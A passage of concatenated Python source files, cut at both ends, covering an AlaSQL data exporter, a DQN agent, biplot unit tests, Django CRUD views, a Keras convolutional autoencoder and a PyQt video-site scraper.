SELECT origen, destino, rango, usuario, valor FROM tarifa ORDER BY origen ASC
"""
rows = query(conn, sql)
data = []
for row in rows:
data.append({
"from": row[0],
"to": row[1],
"range": row[2],
"user": row[3],
"cost": row[4]
})
return data
def output_json(data):
return json.dumps(data)
def output_alasql(data):
create_tables = """
alasql("CREATE TABLE stations (code number, name string, section number, time number, type number)");
const insertStation = alasql.compile(`INSERT INTO stations VALUES(?, ?, ?, ?, ?)`);
alasql("CREATE TABLE users (code number, name string, category string)");
const insertUser = alasql.compile(`INSERT INTO users VALUES(?, ?, ?)`);
alasql("CREATE TABLE schedules (origin number, destination number, day number, time number)");
const insertSchedule = alasql.compile(`INSERT INTO schedules VALUES(?, ?, ?, ?)`);
alasql("CREATE TABLE ranges (code number, name string, category string, start number, end number)");
const insertRange = alasql.compile(`INSERT INTO ranges VALUES(?, ?, ?, ?, ?)`);
alasql("CREATE TABLE fares (from number, to number, range number, user number, cost number)");
const insertFare = alasql.compile(`INSERT INTO fares VALUES(?, ?, ?, ?, ?)`);
"""
stations = ""
for station in data["stations"]:
stations += f'insertStation([{station["code"]}, `{station["name"]}`, {station["section"]}, {station["time"]}, {station["type"]}]);\n'
users = ""
for user in data["users"]:
users += f'insertUser([{user["code"]}, `{user["name"]}`, `{user["category"]}`]);\n'
schedules = ""
for schedule in data["schedules"]:
schedules += f'insertSchedule([{schedule["origin"]}, {schedule["destination"]}, {schedule["day"]}, {schedule["time"]}]);\n'
ranges = ""
for _range in data["ranges"]:
ranges += f'insertRange([{_range["code"]}, `{_range["name"]}`, `{_range["category"]}`, {_range["start"]}, {_range["end"]}]);\n'
fares = ""
for fare in data["fares"]:
fares += f'insertFare([{fare["from"]}, {fare["to"]}, {fare["range"]}, {fare["user"]}, {fare["cost"]}]);\n'
js = f"""
// Internal database using AlaSQL
import alasql from "alasql";
{create_tables}
{stations}
{users}
{ranges}
{fares}
{schedules}
export default alasql;
"""
return js
def main():
conn = connect()
stations = get_stations(conn)
users = get_users(conn)
schedules = get_schedules(conn)
ranges = get_ranges(conn)
fares = get_fares(conn)
data = {
"stations": stations,
"users": users,
"schedules": schedules,
"ranges": ranges,
"fares": fares
}
#print(output_json(data))
print(output_alasql(data))
if __name__ == "__main__":
main() | StarcoderdataPython |
8162119 | from abc import ABC
from typing import Type
from elpis.engines.common.objects.interface import Interface
from elpis.engines.common.objects.model import Model
from elpis.engines.common.objects.transcription import Transcription
from elpis.engines.espnet.objects.model import EspnetModel
from elpis.engines.kaldi.objects.model import KaldiModel
from elpis.engines.kaldi.objects.transcription import KaldiTranscription
from elpis.engines.espnet.objects.transcription import EspnetTranscription
class Engine(ABC):
def __init__(self, model: Type[Model], transcription: Type[Transcription]):
self._model = model
self._transcription = transcription
@property
def model(self) -> Type[Model]:
return self._model
@property
def transcription(self) -> Type[Transcription]:
return self._transcription
def __str__(self):
return f"{type(self).__name__} {type(self.model)} {type(self.transcription)}"
class KaldiEngine(Engine):
def __init__(self):
super().__init__(KaldiModel, KaldiTranscription)
class EspnetEngine(Engine):
def __init__(self):
super().__init__(EspnetModel, EspnetTranscription)
ENGINES = {
"kaldi": KaldiEngine(),
"espnet": EspnetEngine(),
}
| StarcoderdataPython |
8124043 | import numpy as np
import torch
import torch.optim as optim
import torch.nn.functional as F
from agents.common.utils import *
from agents.common.buffers import *
from agents.common.networks import *
class Agent(object):
"""An implementation of the Deep Q-Network (DQN), Double DQN agents."""
def __init__(self,
env,
args,
device,
obs_dim,
act_num,
steps=0,
gamma=0.99,
epsilon=1.0,
epsilon_decay=0.995,
buffer_size=int(1e4),
batch_size=64,
target_update_step=100,
eval_mode=False,
q_losses=list(),
logger=dict(),
):
self.env = env
self.args = args
self.device = device
self.obs_dim = obs_dim
self.act_num = act_num
self.steps = steps
self.gamma = gamma
self.epsilon = epsilon
self.epsilon_decay = epsilon_decay
self.buffer_size = buffer_size
self.batch_size = batch_size
self.target_update_step = target_update_step
self.eval_mode = eval_mode
self.q_losses = q_losses
self.logger = logger
# Main network
self.qf = MLP(self.obs_dim, self.act_num).to(self.device)
# Target network
self.qf_target = MLP(self.obs_dim, self.act_num).to(self.device)
# Initialize target parameters to match main parameters
hard_target_update(self.qf, self.qf_target)
# Create an optimizer
self.qf_optimizer = optim.Adam(self.qf.parameters(), lr=1e-3)
# Experience buffer
self.replay_buffer = ReplayBuffer(self.obs_dim, 1, self.buffer_size, self.device)
def select_action(self, obs):
"""Select an action from the set of available actions."""
# Decaying epsilon
self.epsilon *= self.epsilon_decay
self.epsilon = max(self.epsilon, 0.01)
if np.random.rand() <= self.epsilon:
# Choose a random action with probability epsilon
return np.random.randint(self.act_num)
else:
# Choose the action with highest Q-value at the current state
action = self.qf(obs).argmax()
return action.detach().cpu().numpy()
def train_model(self):
batch = self.replay_buffer.sample(self.batch_size)
obs1 = batch['obs1']
obs2 = batch['obs2']
acts = batch['acts']
rews = batch['rews']
done = batch['done']
if 0: # Check shape of experiences
print("obs1", obs1.shape)
print("obs2", obs2.shape)
print("acts", acts.shape)
print("rews", rews.shape)
print("done", done.shape)
# Prediction Q(s)
q = self.qf(obs1).gather(1, acts.long()).squeeze(1)
# Target for Q regression
if self.args.algo == 'dqn': # DQN
q_target = self.qf_target(obs2)
elif self.args.algo == 'ddqn': # Double DQN
q2 = self.qf(obs2)
q_target = self.qf_target(obs2)
q_target = q_target.gather(1, q2.max(1)[1].unsqueeze(1))
q_backup = rews + self.gamma*(1-done)*q_target.max(1)[0]
q_backup.to(self.device)
if 0: # Check shape of prediction and target
print("q", q.shape)
print("q_backup", q_backup.shape)
# Update perdiction network parameter
qf_loss = F.mse_loss(q, q_backup.detach())
self.qf_optimizer.zero_grad()
qf_loss.backward()
self.qf_optimizer.step()
# Synchronize target parameters 𝜃‾ as 𝜃 every C steps
if self.steps % self.target_update_step == 0:
hard_target_update(self.qf, self.qf_target)
# Save loss
self.q_losses.append(qf_loss.item())
def run(self, max_step):
step_number = 0
total_reward = 0.
obs = self.env.reset()
done = False
# Keep interacting until agent reaches a terminal state.
while not (done or step_number == max_step):
if self.args.render:
self.env.render()
if self.eval_mode:
q_value = self.qf(torch.Tensor(obs).to(self.device)).argmax()
action = q_value.detach().cpu().numpy()
next_obs, reward, done, _ = self.env.step(action)
else:
self.steps += 1
# Collect experience (s, a, r, s') using some policy
action = self.select_action(torch.Tensor(obs).to(self.device))
next_obs, reward, done, _ = self.env.step(action)
# Add experience to replay buffer
self.replay_buffer.add(obs, action, reward, next_obs, done)
# Start training when the number of experience is greater than batch_size
if self.steps > self.batch_size:
self.train_model()
total_reward += reward
step_number += 1
obs = next_obs
# Save logs
self.logger['LossQ'] = round(np.mean(self.q_losses), 5)
return step_number, total_reward
| StarcoderdataPython |
3238145 | <filename>test/test_biplot.py<gh_stars>1-10
import unittest
import numpy as np
import pandas as pd
from biofes.biplot import *
from biofes import biplot
from scipy import stats
class test_functions(unittest.TestCase):
def test_standardize(self):
A = np.random.uniform(-300,300,size=(300,30))
A_st = standardize(A, meth=1)
A_ref = (A-A.mean(axis = 0))/A.std(axis = 0)
self.assertAlmostEqual(np.mean(A_ref - A_st), 0, msg='standardization error')
def test_Factor2Binary(self):
target = list(np.random.randint(np.random.randint(2, 10), size = 100))
Z = Factor2Binary(target,Name = None)
Z_ref = pd.get_dummies(target)
self.assertAlmostEqual(np.mean(Z_ref.values - Z.values), 0, msg='Factor2Binary error')
def test_matrixsqrt(self):
A = np.random.randint(low = 0, high = 200, size=(300, 30))
d = np.random.randint(30)
tol = np.finfo(float).eps
Sinv = matrixsqrt(A, d, tol, inv=True)
U, Sigma, VT = SVD(A, d, niter=5, state=0)
nz = Sigma > tol
Sinv_ref = U.dot(np.diag(1/np.sqrt(Sigma[nz]))).dot(VT[nz,:])
self.assertAlmostEqual(np.mean(Sinv_ref - Sinv), 0, delta=1e-3, msg='matrixsqrt (inv=True) error')
###############################################################################
A = np.random.randint(low = 0, high = 200, size=(300, 30))
d = np.random.randint(30)
tol = np.finfo(float).eps
S = matrixsqrt(A, d, tol, inv=False)
U, Sigma, VT = SVD(A, d, niter=5, state=0)
nz = Sigma > tol
S_ref = U.dot(np.diag(np.sqrt(Sigma[nz]))).dot(VT[nz,:])
self.assertAlmostEqual(np.mean(S_ref - S), 0, delta=1e-3, msg='matrixsqrt (inv=False) error')
class test_biplot(unittest.TestCase):
def test_Classic(self):
n, p = np.random.randint(70,500), np.random.randint(30,50)
A = np.random.uniform(-300,300,size=(n,p))
d = np.random.randint(p)
a = np.random.random(1)[0]
methods = [None, 1]
m = methods[np.random.randint(2)]
data_st = standardize(A, m)
U, Sigma, VT = SVD(data_st, d, niter = 35, state = 0)
EV_ref = np.power(Sigma,2)
Inert_ref = EV_ref/np.sum(EV_ref) * 100
# Contributions
R = U.dot(np.diag(Sigma[:d]))
C = np.transpose(VT).dot(np.diag(Sigma[:d]))
sf = np.sum(np.power(A,2),axis=1)
cf = np.zeros((n,d))
for k in range(0,d):
cf[:,k] = np.power(R[:,k],2)*100/sf
sc = np.sum(np.power(A, 2),axis=0)
cc = np.zeros((p,d))
for k in range(0,d):
cc[:,k] = np.power(C[:,k],2)*100/sc
# Coordinates
R = R.dot(np.diag(np.power(Sigma,a)))
C = C.dot(np.diag(np.power(Sigma,1-a)))
sca = np.sum(np.power(R,2))/n
scb = np.sum(np.power(C,2))/p
scf = np.sqrt(np.sqrt(scb/sca))
RowCoord_ref = R*scf
ColCoord_ref = C/scf
# biplot from biofes
BCla = biplot.Classic(data = A ,dim = d, alpha = a, method = m, niter = 35, state = 0)
# DIMENSION TEST
self.assertEqual(BCla.RowCoord.shape, (n, d), msg='dimension output error (Classic Biplot)')
self.assertEqual(BCla.ColCoord.shape, (p, d) , msg='dimension output error (Classic Biplot)')
self.assertEqual(len(BCla.Inert), d, msg='dimension output error (Classic Biplot)')
self.assertEqual(len(BCla.EV) , d, msg='dimension output error (Classic Biplot)')
# INERTIA / EV TEST
try:
if str((EV_ref - EV).mean()) == 'nan':
pass
else:
self.assertAlmostEqual(np.mean(EV_ref - BCla.EV), 0, msg='EV error')
self.assertAlmostEqual(np.mean(Inert_ref - BCla.Inert), 0, msg='Inertia error')
except:
pass
# CONTRIBUTIONS TEST
try:
if str((cf - BCla.RowCont).mean()) == 'nan':
pass
else:
els = cf.shape[0]*cf.shape[1]
self.assertAlmostEqual(np.mean(cf - BCla.RowCont), 0, delta=els*(1e-2), msg='Row Contributions error')
els = cc.shape[0]*cc.shape[1]
self.assertAlmostEqual(np.mean(cc - BCla.ColCont), 0, delta=els*(1e-2), msg='Column Contributions error')
except:
pass
# COORDINATES TEST
self.assertAlmostEqual(np.mean(RowCoord_ref - BCla.RowCoord), 0, delta=1e-3, msg='Row Coordinates error')
self.assertAlmostEqual(np.mean(ColCoord_ref - BCla.ColCoord), 0, delta=1e-3, msg='Col Coordinates error')
def test_Canonical(self):
n, m = np.random.randint(70,500), np.random.randint(10,50)
A = np.random.uniform(-300,300,size=(n,m))
target = list(np.random.randint(np.random.randint(2, 10), size = A.shape[0]))
gn = list(set(target))
g = len(gn)
d = np.random.randint(len(gn)+1, m)
methods = [None, 1]
met = methods[np.random.randint(2)]
data_std = standardize(A, met)
r = np.array([len(gn) - 1, m]).min()
#Groups to Binary
Z = Factor2Binary(target)
ng = Z.sum(axis=0)
S11 = (Z.T).dot(Z).values
Xb = np.linalg.inv(S11).dot(Z.T).dot(data_std)
B = (Xb.T).dot(S11).dot(Xb)
S = (data_std.T).dot(data_std) - B
Y = np.power(S11,0.5).dot(Xb).dot(matrixsqrt(S,d,inv=True))
U, Sigma, VT = SVD(Y, d, niter = 15, state = 0)
#Variable_Coord
H = matrixsqrt(S, d, inv=False).dot(np.transpose(VT[0:r,:]))
#Canonical_Weights
B = matrixsqrt(S, d, inv=True ).dot(np.transpose(VT[0:r,:]))
#Group_Coord
J = Xb.dot(B)
#Individual_Coord
V = data_std.dot(B)
sct = np.diag((V.T).dot(V))
sce = np.diag((J.T).dot(S11).dot(J))
scr = sct -sce
fs = (sce/(g - 1))/(scr/(n - g))
#eigenvectors
vprop = Sigma[:r]
#Inertia
iner = (np.power(vprop,2)/(np.power(vprop,2).sum()))*100
lamb = np.power(vprop,2)
pill = 1/(1 + lamb)
pillai = np.linalg.det(np.diag(pill))
glh = g - 1
gle = n - g
t = np.sqrt((np.power(glh,2) * np.power(m,2) - 4)/(np.power(m,2) + np.power(glh,2) - 5))
w = gle + glh - 0.5 * (m + glh + 1)
df1 = m * glh
df2 = w * t - 0.5 * (m * glh - 2)
# Wilks
Wilksf = (1 - np.power(pillai,1/t))/(np.power(pillai,1/t)) * (df2/df1)
Wilksp = stats.f.pdf(Wilksf, df1, df2)
Wilks = {'f-val': Wilksf,'p-val': Wilksp}
# Radius
falfau = stats.t.ppf(1 - (0.025), (n - g))
falfab = stats.t.ppf(1 - (0.025/(g * m)), (n - g))
falfam = np.sqrt(stats.f.ppf(1 - 0.05, m, (n - g - m + 1)) * (((n - g) * m)/(n - g - m + 1)))
falfac = 2.447747
UnivRad = falfau * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
BonfRad = falfab * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
MultRad = falfam * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
ChisRad = falfac * np.diag(np.linalg.inv(np.sqrt(S11)))/np.sqrt(n - g)
Radius = {'Uni': UnivRad,'Bonf': BonfRad, 'Mult': MultRad, 'Chis': ChisRad}
BCan = biplot.Canonical(data = A, dim = d, GroupNames = gn, y = target, method = met, niter = 35, state = 0)
# DIMENSION TEST
self.assertEqual(BCan.Ind_Coord.shape, (n, len(gn)-1), msg='dimension output error (Canonical Biplot) Ind_Coord')
self.assertEqual(BCan.Var_Coord.shape, (m, len(gn)-1), msg='dimension output error (Canonical Biplot) Var_Coord')
self.assertEqual(BCan.Group_Coord.shape, (len(gn), len(gn)-1), msg='dimension output error (Canonical Biplot) Group_Coord')
self.assertEqual(len(BCan.inert), len(gn)-1, msg='dimension output error (Canonical Biplot)')
# COORDINATES TEST
els = H.shape[0]*H.shape[1]
self.assertAlmostEqual(np.mean(H - BCan.Var_Coord), 0, delta=els*(1e-2), msg='Var Coordinates error')
els = V.shape[0]*V.shape[1]
self.assertAlmostEqual(np.mean(V - BCan.Ind_Coord), 0, delta=els*(1e-2), msg='Ind Coordinates error')
els = J.shape[0]*J.shape[1]
self.assertAlmostEqual(np.mean(J - BCan.Group_Coord), 0, delta=els*(1e-2), msg='Group Coordinates error')
# CANONICAL WEIGHTS TEST
els = B.shape[0]*B.shape[1]
self.assertAlmostEqual(np.mean(B - BCan.Can_Weights), 0, delta=els*(1e-2), msg='Canonical Weights error')
# EV / INERTIA TEST
try:
if str((vprop - BCan.vprop).mean()) == 'nan':
pass
else:
self.assertAlmostEqual(np.mean(vprop - BCan.vprop), 0, msg='EV error')
self.assertAlmostEqual(np.mean(iner - BCan.inert), 0, msg='Inertia error')
except:
pass
# WILKS TEST
self.assertAlmostEqual(Wilks['f-val'] - BCan.Wilks['f-val'], 0, delta=(1e-2), msg='f-val Wilks error')
self.assertAlmostEqual(Wilks['p-val'] - BCan.Wilks['p-val'], 0, delta=(1e-2), msg='p-val Wilks error')
# RADIUS
self.assertAlmostEqual(np.mean(Radius['Uni'] - BCan.Radius['Uni']), 0, delta=(1e-3), msg='Uni Radius error')
self.assertAlmostEqual(np.mean(Radius['Bonf'] - BCan.Radius['Bonf']), 0, delta=(1e-3), msg='Bonferroni Radius error')
self.assertAlmostEqual(np.mean(Radius['Mult'] - BCan.Radius['Mult']), 0, delta=(1e-3), msg='Mult Radius error')
self.assertAlmostEqual(np.mean(Radius['Chis'] - BCan.Radius['Chis']), 0, delta=(1e-3), msg='Chi-sqr Radius error')
def test_CA(self):
n, p = np.random.randint(100, 500), np.random.randint(50, 90)
A = np.random.randint(np.random.randint(1,10), np.random.randint(30,200), (n,p))
dim = np.random.randint(p)
a = np.random.random(1)[0]
BCA = biplot.CA(data=A, dim=dim, alpha=a ,niter=15, state=0)
A = A / A.sum()
dr = np.matrix(A.sum(axis=1))
dc = np.matrix(A.sum(axis=0))
A = A - dr.T.dot(dc)
Dr = np.diagflat(1/np.sqrt(dr))
Dc = np.diagflat(1/np.sqrt(dc))
A = Dr.dot(A).dot(Dc)
U, Sigma, VT = SVD(A, dim, niter = 15, state = 0)
d = Sigma[:np.min(A.shape)]
r = np.min(A.shape)
inertia = numpy.power(d,2)*100 / numpy.sum(numpy.power(d,2))
U = Dr.dot(U[:,:r])
V = Dc.dot(VT.T[:,:r])
D = np.diagflat(d)
A = U.dot(D)
B = V.dot(D)
sf = np.power(A,2).sum(axis = 1)
cf = np.linalg.inv(np.diagflat(sf)).dot(np.power(A,2))
sc = np.power(B,2).sum(axis = 1)
cc = np.linalg.inv(np.diagflat(sc)).dot(np.power(B,2))
A = U.dot(np.diagflat(np.power(d,a)))
B = V.dot(np.diagflat(np.power(d,1-a)))
# AB
AB = A[:, :dim].dot(B[:, :dim].T)
# Eigenvalues
eigen_values = np.power(d,2)
# Coordinates
RowCoordinates = A[:, :dim]
ColCoordinates = B[:, :dim]
# Contributions
RowContributions = cf[:, :dim] * 100
ColContributions = cc[:, :dim] * 100
# INERTIA TEST
try:
if str((inertia - BCA.inertia).mean()) == 'nan':
pass
else:
self.assertAlmostEqual(np.mean(inertia - BCA.inertia), 0, msg='Inertia error')
self.assertAlmostEqual(np.mean(eigen_values - BCA.eigen_values), 0, msg='eigen values error')
except:
pass
# AB TEST
self.assertAlmostEqual(np.mean(AB - BCA.AB), 0, delta=(1e-2), msg='AB error')
# COORDINATES TEST
els = RowCoordinates.shape[0]*RowCoordinates.shape[1]
self.assertAlmostEqual(np.mean(RowCoordinates - BCA.RowCoordinates), 0, delta=els*(1e-2), msg='Row Coordinates error')
els = ColCoordinates.shape[0]*ColCoordinates.shape[1]
self.assertAlmostEqual(np.mean(ColCoordinates - BCA.ColCoordinates), 0, delta=els*(1e-2), msg='Col Coordinates error')
# CONTRIBUTIONS TEST
try:
if str((cf - BCla.RowCont).mean()) == 'nan':
pass
else:
els = RowContributions.shape[0]*RowContributions.shape[1]
self.assertAlmostEqual(np.mean(RowContributions - BCA.RowContributions), 0, delta=els*(1e-2), msg='Row Contributions error')
els = ColContributions.shape[0]*ColContributions.shape[1]
self.assertAlmostEqual(np.mean(ColContributions - BCA.ColContributions), 0, delta=els*(1e-2), msg='Column Contributions error')
except:
pass
if __name__ == '__main__':
unittest.main() | StarcoderdataPython |
3481584 | from django.urls import reverse_lazy
from django.views.generic import (
ListView,
DetailView,
CreateView,
TemplateView,
UpdateView,
DeleteView,
)
from .models import (
ActivosFijos,
)
# Create your views here.
#<=====CRUD ActivosFijos======>
class SuccessAddActivoFijo(TemplateView):
template_name = "ppe/success-add-activo.html"
class ActivoFijo(CreateView):
model = ActivosFijos
template_name = "ppe/add-activo.html"
fields = [
'empresa',
'descripcion',
'codigo_cta',
'mes_adquisicion',
'ano_adquisicion',
'valor_origen',
'vida_util',
'cta_contable_amort_acum',
'amort_acum',
'cta_contable_amort_ejercicio',
'amort_ejercicio',
]
success_url = reverse_lazy('ppe_app:success_add_activo')
class UpdateSuccessActivo(TemplateView):
template_name = "ppe/update_activo_success.html"
class ActivoContableUpdate(UpdateView):
model = ActivosFijos
template_name = "ppe/update-activo.html"
fields = [
'empresa',
'descripcion',
'codigo_cta',
'mes_adquisicion',
'ano_adquisicion',
'valor_origen',
'vida_util',
'cta_contable_amort_acum',
'amort_acum',
'cta_contable_amort_ejercicio',
'amort_ejercicio',
]
success_url = reverse_lazy('ppe_app:success_update_activo')
class ActivoDetail(DetailView):
model = ActivosFijos
template_name = "ppe/detail-activo.html"
class DeleteSuccessActivo(TemplateView):
template_name = "ppe/delete_activo_success.html"
class ActivoDelete(DeleteView):
model = ActivosFijos
template_name = "ppe/delete-activo.html"
success_url = reverse_lazy('ppe_app:success_delete_activo')
#<=====END CRUD ActivosFijos======> | StarcoderdataPython |
1719723 | # -*- coding: utf-8 -*-
"""
Created on Tue Aug 21 13:03:42 2018
@author: <NAME>
"""
import numpy as np
import matplotlib.pyplot as plt
from IPython.display import SVG, display
#Import Keras objects
from keras.models import Model
from keras.layers import Input, Flatten, Reshape, Softmax
from keras.layers import Dense, UpSampling1D
from keras.layers import Conv1D, MaxPool1D
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, TensorBoard, EarlyStopping
from keras.utils.vis_utils import model_to_dot
from keras.utils import multi_gpu_model
from keras.regularizers import l1
from tensorboard.backend.event_processing.event_accumulator import EventAccumulator
import keras.backend as K
from os import listdir
from os.path import isfile, join
class ModelMGPU(Model):
def __init__(self, ser_model, gpus):
pmodel = multi_gpu_model(ser_model, gpus)
self.__dict__.update(pmodel.__dict__)
self._smodel = ser_model
def __getattribute__(self, attrname):
'''Override load and save methods to be used from the serial-model. The
serial-model holds references to the weights in the multi-gpu model.
'''
# return Model.__getattribute__(self, attrname)
if 'load' in attrname or 'save' in attrname:
return getattr(self._smodel, attrname)
return super(ModelMGPU, self).__getattribute__(attrname)
def jaccard(yt, yp, sm=1e-6):
yt=K.batch_flatten(yt)
yp=K.batch_flatten(yp)
intr = K.sum(yt*yp,axis=-1)
sum_ = K.sum(yt + yp,axis=-1)
jac = (intr + sm) / (sum_ - intr + sm)
return K.mean(jac)
def jaccard_loss(y_true, y_pred, sm=1e-6):
return (1.0 - jaccard(y_true,y_pred,sm))
def dice(y_true, y_pred, sm=1e-6):
yp=K.batch_flatten(y_pred)
yt=K.batch_flatten(y_true)
intr = K.sum(yt*yp,axis=-1)
sum_ = K.sum(K.square(yt)+K.square(yp),axis=-1) + sm
dce = (2.0 * intr + sm) / sum_
return K.mean(dce)
def dice_loss(y_true, y_pred, sm=1e-6):
return 1.0 - dice(y_true, y_pred, sm)
def Wo(W,F=2,S=2):
P = W % 2
return (W-F+2*P)//S+1
class CNAE:
def __init__(self,smt,lrep=4, nEL=1,opt='adam',
ngpu=1,reg=0.001,kern=5,flt=32,batch=256,EPO=1):
self.ngpu=ngpu
self.EPO=EPO
self.batch=batch
smiLen = smt.smiLen
codeLen = smt.codeLen
k = smiLen
inputs = Input(shape=(smiLen,codeLen,),name='IN1')
for L in range(nEL):
if L==0:
x = Conv1D(flt,kern,name='C1',activation='relu',padding='same')(inputs)
else:
x = Conv1D(flt,kern,name=f'C{L+1}',activation='relu',padding='same')(x)
x = MaxPool1D(2,padding='same')(x)
k = Wo(k)
x = Conv1D(flt,kern,name=f'C{nEL+1}',activation='relu',padding='same')(x)
x = MaxPool1D(2,padding='same')(x)
k = Wo(k)
x = Flatten()(x)
enc = Dense(lrep,name='Encoded',activation='relu',activity_regularizer=l1(reg))(x)
x = Dense(k*flt)(enc)
x = Reshape((k,flt,))(x)
k2 = k
for L in range(nEL):
x = Conv1D(flt,kern,name=f'D{L+1}',activation='relu',padding='same')(x)
x = UpSampling1D(2)(x)
k2 = k2 * 2
x = Conv1D(smt.codeLen,kern,name=f'D{nEL+1}',activation='relu',padding='same')(x)
x = UpSampling1D(2)(x)
k2 = k2 * 2
f = k2 - smt.smiLen + 1
x = Conv1D(smt.codeLen,f,name='outp',padding='valid')(x)
op = Softmax(axis=-1)(x)
self.enc = Model(inputs,enc)
self.aen = Model(inputs,op)
N = 6 + nEL * 2
inp2 = Input(shape=(lrep,),name='IN2')
for L in range(N):
if L==0:
deco = self.aen.layers[L-N](inp2)
else:
deco = self.aen.layers[L-N](deco)
self.dec = Model(inp2,deco)
if self.ngpu>1:
self.mgm = ModelMGPU(self.aen,gpus=self.ngpu)
self.mgm.compile(optimizer=opt, loss='binary_crossentropy',metrics=['acc',jaccard,dice_loss])
else:
self.aen.compile(optimizer=opt, loss='binary_crossentropy',metrics=['acc',jaccard,dice_loss])
self.mgm = None
def aeTrain(self,trn,fn,vb=0,mdelta=0.0002,esp=10,EPO=None):
if EPO is None:
epo = self.EPO
else:
epo = EPO
bat=self.batch
modsave = f'data/{fn}.hdf5'
chkptr = ModelCheckpoint(filepath = modsave, verbose = 0, save_best_only = True)
rlr = ReduceLROnPlateau(monitor = 'val_loss', factor = 0.2, patience = 2, min_lr = 0.000001)
lgd = f'logs/{fn}'
tb = TensorBoard(log_dir=lgd)
estp = EarlyStopping(patience=esp,restore_best_weights=True,min_delta=mdelta)
cblist=[chkptr,estp,tb,rlr]
if self.mgm is None:
self.aen.fit(trn, trn, shuffle = True, epochs = epo, batch_size = bat,
callbacks = cblist, validation_split = 0.2,verbose=vb)
self.aen.load_weights(modsave)
else:
self.mgm.fit(trn, trn, shuffle = True, epochs = epo, batch_size = bat,
callbacks = cblist, validation_split = 0.2,verbose=vb)
self.mgm.load_weights(modsave)
return modsave,lgd
def loadw(self,modsave):
if self.mgm is None:
self.aen.load_weights(modsave)
else:
self.mgm.load_weights(modsave)
def evaluate(self,x):
if self.mgm is None:
sc = self.aen.evaluate(x,x)
else:
sc = self.mgm.evaluate(x,x)
return sc #0 -> loss
def plotm(model):
display(SVG(model_to_dot(model,show_shapes=True).create(prog='dot', format='svg')))
def getFileList(mypath):
return [f for f in listdir(mypath) if isfile(join(mypath, f))]
def tbHistoryPlot(lgd):
fn = getFileList(lgd)
fn = fn[-1]
eacc = EventAccumulator(lgd+'/'+fn)
eacc.Reload()
tj = eacc.Scalars('loss')
vj = eacc.Scalars('val_loss')
steps = len(tj)
x = np.arange(steps)
y = np.zeros([steps, 2])
for i in range(steps):
y[i, 0] = tj[i][2] # value
y[i, 1] = vj[i][2]
plt.plot(x, y[:,0], label='training loss')
plt.plot(x, y[:,1], label='validation loss')
plt.xlabel("Steps")
plt.ylabel("Loss")
plt.title("Re-Training Progress")
plt.legend(loc='upper right', frameon=True)
plt.show()
#%%
if __name__ == "__main__":
pass
| StarcoderdataPython |
9784175 | from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QGridLayout, QLabel,
QScrollArea)
from PyQt5.QtGui import (QPixmap, QImage)
from PyQt5.QtCore import Qt
from bs4 import BeautifulSoup
import requests
import urllib.request
from urllib.request import Request
import functools
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from mainVideo import MainVideo
from getVideo import GetVideo
from searchBar import SearchBar
class MainWindow(QMainWindow):
def __init__(self):
super().__init__()
self.base_url = ""
self.init_ui()
def init_ui(self):
searchBar = SearchBar()
self.addDockWidget(Qt.TopDockWidgetArea, searchBar)
searchBar.search.connect(self.searchText)
self.gridLayout = self.gridResult()
'''
VideoWindow: This function takes in video url and image index to get the video.
Note:
source_object = label ==> is not used by the function right now.
'''
def videoWindow(self, event, source_object=None, video=None, index=None):
print("Clicked, from", source_object, video, "Index: ", index)
# # self.getVideo(video)
if self.cacheLinks[index] == "":
videoUrl = GetVideo()
url = videoUrl.getVideoLink(video)
self.cacheLinks[index] = url
# print(url)
else:
url = self.cacheLinks[index]
print(url)
self.mainVideo = MainVideo(self.base_url + url)
def getVideo(self, url):
# All Working in here ----------------------
options = Options()
options.add_argument("headless")
caps = DesiredCapabilities().CHROME
caps["pageLoadStrategy"] = "none"
chrome_path = r"./driver/chromedriver"
driver = webdriver.Chrome(chrome_path, chrome_options=options)
driver.get(url)
html = driver.page_source # driver.find_element_by_tag_name("html")
# html = driver.find_element_by_id("player_el")
driver.close()
print(type(html))
# print((html))
# print(html.get_attribute("innerHTML"))
# print(html.get_attribute("outerHTML"))
self.getVideoLink(html)
# print(self.base_url + videoLink["src"])
# self.mainVideo = MainVideo(self.base_url + videoLink["src"])
# print(driver.current_url)
def getVideoLink(self, html):
source = BeautifulSoup(html, "lxml")
# source = BeautifulSoup(html, "html.parser")
videoLink = source.find(id="player_el")
print(type(videoLink))
print(videoLink["src"])
def searchText(self, text):
if text != "":
self.gridResult(self.base_url + "/" + "-".join(text.split()) + ".html")
# self.update()
def gridResult(self, url=None):
if url is None:
url = self.base_url
source = requests.get(url).text
html = BeautifulSoup(source, "lxml")
# print("Source type: ", type(source))
# print("HTML type: ", type(html))
# print(html.prettify())
links = html.select("div.post_text + a")
titles = html.select("div.post_text")
videoLinks = []
imageLinks = []
''' Index to keep track of which image was clicked on. '''
index = 0
'''
Create an empty array to store the links of the visited video.
'''
self.cacheLinks = []
'''
Initialize 36 empty string to the cachelinks array.
To check if the link is present in that particular index.
'''
for i in range(36):
self.cacheLinks.append("")
'''
Iterate over the links to get the image source and the page source of the video.
'''
for link in links:
if link.img is not None:
img = "http:" + link.img['src'] # Get the image source
url = Request(img)
data = urllib.request.urlopen(url).read()
image = QImage()
image.loadFromData(data)
container = QVBoxLayout()
label1 = QLabel()
label2 = QLabel(titles[index].text)
# label1.setText("Hello")
label1.setPixmap(QPixmap(image).scaled(200, 150, Qt.KeepAspectRatio))
label1.setScaledContents(True)
label1.setStyleSheet("border: 1px solid black")
label1.mousePressEvent = functools.partial(self.videoWindow, source_object=label1,
video=self.base_url + link['href'], index=index)
print(label2.text())
label1.setMaximumWidth(320)
label1.setMaximumHeight(200)
label2.setMaximumWidth(230)
label2.setMaximumHeight(15)
container.addWidget(label2)
container.addWidget(label1)
videoLinks.append(self.base_url + link['href'])
'''
Append all the data to attach to the GridLayout.
'''
imageLinks.append(container)
# imageLinks.append(label1)
index += 1
'''
Put all the images in the Grid Layout.
Click the image to pop up the video playing window.
'''
a = 1
r = 0
c = 0
gridLayout = QGridLayout()
for x in imageLinks:
if a < 3:
a += 1
else:
a = 1
gridLayout.addLayout(x, r, c)
# gridLayout.addWidget(x, r, c)
c += 1
if c == 3:
c = 0
r += 1
scrollArea = QScrollArea()
scrollChildArea = QWidget()
